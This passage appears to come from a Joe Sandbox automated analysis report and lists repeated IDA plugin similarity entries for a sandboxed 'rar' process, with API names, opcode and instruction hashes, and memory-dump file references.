                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction ID: 466f7d92c7da7ca3179a5d8369334d6402a67b6aa691cc2c29a7d6881a595188
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83E08C68F192C346FF18BFF2A8052F492D06F58BB4FD84030D90D86292EE2CA4616234
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                                                                              • Instruction ID: 0850cb0d14bdc7832aded48b767c754467e98f44bce6800dd999c65ebba7bd8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98E1DC22A087C281FF20AE2194446FEA7D1EF41BA8FC44135DE4D4B69ADF2CA465E730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
                                                                                                                                                                                                                              • Instruction ID: 10ad8f026e8c3683044d6038e04bec73075ff9ddbc507c3d0c366ff730ac86ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83512773518BD295E700AF24A8441ED77A8FB44F98F98423ADE880B79ADF395161D331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction ID: 4ac4d0f03b4c7b143d5fb4bc0f519bca5c18b7fac937d103297e8450029beea9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F41D329E096C387FB68BF1498503F8A3E1AFA0764F804435D90D476E5DE3DE858A770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3253501508-0
                                                                                                                                                                                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction ID: b68cbe98ef264fe739411877c3909bd6004c5f819ac4f6bbe52d90300a53cd28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC01C41560D68289EA10FF16A4001FDA6E0AF85BB4F985431EE4D07369CE3DE6619330
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction ID: fb4bc52db7f65b2b8368b14f9a176514226883dd0bbb55547ed8b27be5e4f28f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92011A5CA0C6C244FA64BEA65A413FAE1D05F99BF4FD88231ED1D462D6ED2CE4216231
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1825529933-0
                                                                                                                                                                                                                              • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction ID: c5af0baa7acecb8ca71c561e00d880501e28f5c2f00c6ec207d27807b7a7d8f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7201DB6170C7D245EA107F03A4051AAE690BB59FD1FAC4434EFCD8BB5ACE3CD4524724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                                                                                                                                                                                              • Instruction ID: e9852dcb504144f720d84f8c1a66ea59cc6967f9f3a54d7ea87e24695c6f350f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9F06D21A092C186EF15AE6195012F8A690EB06BB8F684335DEBC0B2D7CE6990A49730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction ID: be5f9e35d76f2fa77cb1df3d5a6c4e96cb34db76536391b1209b3df29f96d081
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0FE2DB4D2C245FE547EB258423F5A2C09F887B0FE80630ED2E863C1DE6CE8616134
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction ID: aceee7fd45907bb656288067046fd51e26b997fed71c2f85786a188cd9586349
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EE04F60F1938640ED683E221C520F982C11F6ABA0FE45438CD1F46382DC1FA0B97731
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction ID: e4185ecf7d38273bf64a1606fe720bc4be5431979cdf99884964c410f7b3c92c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D06765E1A98685FB06AF41AC457B092B16F647B9FD30634C81D49555CFAD60A48330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A4549
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction ID: 9f63dafef81cc37573bd5e67b282c2d8b6c756224f39922ec23341de0bbe0607
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1C08C21E024C184CA046B698C450A41150BB84735FD00330C13D052E0CE1880BB0320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
